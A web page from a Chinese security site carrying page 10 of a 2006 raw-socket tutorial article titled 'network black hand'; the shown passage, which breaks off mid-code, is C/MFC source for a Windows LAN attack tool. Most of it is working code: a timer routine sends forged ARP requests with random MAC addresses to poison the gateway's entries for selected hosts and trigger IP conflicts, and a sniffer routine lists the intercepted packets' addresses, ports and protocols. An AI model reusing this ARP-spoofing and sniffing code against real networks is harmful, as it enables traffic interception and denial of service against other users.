网络安全参考 | UNIX参考 | GPS参考 | 无线参考 | 在线手册 | OSBUG.ORG | SUNNY-NETWORK.COM
网站地图 RSS订阅
高级搜索 收藏本站
Home | 业界动态 | 防火墙 | IDS/IPS | VPN | PKI | Honeypot | Hacker/Intruder | 黑客技术 | 破解技术 | 加密技术 | 病毒防护 | 木马 | 反垃圾邮件 | 反流氓软件 | 漏洞 | 无线安全 | UNIX | Windows | 安全编程 | 安全软件 | TPM/TCG | 数据恢复 | 企业信息安全 | 个人信息安全
 当前位置: Home > 安全编程 > 网络编程 > 文章  
原始套接字透析之综合实例:网络黑手
文章来源: 天极开发 文章作者: 宋宝华 发布时间: 2006-11-17   字体: [ ]
 

mac[5] = rand();
for (i = 0; i < currentHstIndex; i++)
{
 unsigned long ip;
 if (hostList[i].arpCheat == 1)
 {
  ip = (hostList[i].ip &0xff) << 24;
  ip += (hostList[i].ip &0xff00) << 8;
  ip += (hostList[i].ip &0xff0000) >> 8;
  ip += (hostList[i].ip &0xff000000) >> 24;
  SendArpReq(gateip, ip, mac); //网关->欺骗IP
 }
 if (hostList[i].ipConflict == 1)
 {
  ip = (hostList[i].ip &0xff) << 24;
  ip += (hostList[i].ip &0xff00) << 8;
  ip += (hostList[i].ip &0xff0000) >> 8;
  ip += (hostList[i].ip &0xff000000) >> 24;
  SendArpReq(ip, 2, mac);
 }
}

memcpy(oldHostList, hostList, sizeof(HostList) *MAX_HOST);
oldHstIndex = currentHstIndex;
currentHstIndex = 0;

OnRecvPkt();

sthread = CreateThread(NULL, 0, CheckHost, 0, 0, 0);
CDialog::OnTimer(nIDEvent);
}

  Sniffer到需要监听节点的报文后,sniffer线程会主动给对话框发送消息,以更新显示:

void CNetHackerDlg::OnRecvPkt()
{
 CString str;

 for (int i = 1; i <= MAX_PACKET; i++)
 {
  if (!packetList[i - 1].srcIp)
   break;

  m_packetList.SetText(i, 0, inet_ntoa(*(struct in_addr*)(&(packetList[i - 1].srcIp))));
  m_packetList.SetText(i, 1, inet_ntoa(*(struct in_addr*)(&(packetList[i - 1].desIp))));
  switch (packetList[i - 1].protocol)
  {
   case IPPROTO_TCP:
    m_packetList.SetText(i, 2, "TCP");
    str.Format("%d", packetList[i - 1].srcPort);
    m_packetList.SetText(i, 3, str);
    str.Format("%d", packetList[i - 1].desPort);
    m_packetList.SetText(i, 4, str);
    break;
   case IPPROTO_UDP:
    m_packetList.SetText(i, 2, "UDP");
    str.Format("%d", packetList[i - 1].srcPort);
    m_packetList.SetText(i, 3, str);
    str.Format("%d", packetList[i - 1].desPort);
    m_packetList.SetText(i, 4, str);
    break;
   case IPPROTO_ICMP:
    m_packetList.SetText(i, 2, "ICMP");
    m_packetList.SetText(i, 3, "X");
    m_packetList.SetText(i, 4, "X");
    break;
   case IPPROTO_IGMP:
    m_packetList.SetText(i, 2, "IGMP");
    m_packetList.SetText(i, 3, "X");
    m_packetList.SetText(i, 4, "X");
    break;
   case ARP:
    m_packetList.SetText(i, 2, "ARP");
    m_packetList.SetText(i, 3, "X");
    m_packetList.SetText(i, 4, "X");
    break;

 
推荐文章
·洪水攻击原理及代码实现全攻略(
·原始套接字透析之实现IP地址欺骗
·原始套接字透析之ARP欺骗
·原始套接字透析之实现包分析
·原始套接字透析之实现sniffer
·原始套接字透析之实现路由欺骗
·原始套接字透析之ICMP拒绝服务攻
·原始套接字透析之实现Ping
·原始套接字透析之Raw Socket基础
·黑客之旅 -- 原始套接字透析之前
 

 
共15页: 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] 10 [11] [12] [13] [14] [15] 下一页
↑返回顶部   打印本页   关闭窗口↓  

Google
 
Web oldhand.org unixreference.net meshmea.org
热点文章
·原始套接字透析之Raw So
·原始套接字透析之ARP欺
·洪水攻击原理及代码实现
·原始套接字透析之实现Pi
·黑客之旅 -- 原始套接字
·原始套接字透析之实现路
·原始套接字透析之实现包
·原始套接字透析之ICMP拒
相关分类
相关文章
·洪水攻击原理及代码实现
·原始套接字透析之实现IP
·原始套接字透析之ARP欺
·原始套接字透析之实现包
·原始套接字透析之实现sn
·原始套接字透析之实现路
·原始套接字透析之ICMP拒
·原始套接字透析之实现Pi
更多...
 
 
Copyright(c) 2001-2008 OLDHAND ORGANIZATION, All Rights reserved.
Power by DedeCms 织梦内容管理系统
$Id: article_article.html,v 1.3 2007/02/10 12:00:37 yjs Exp $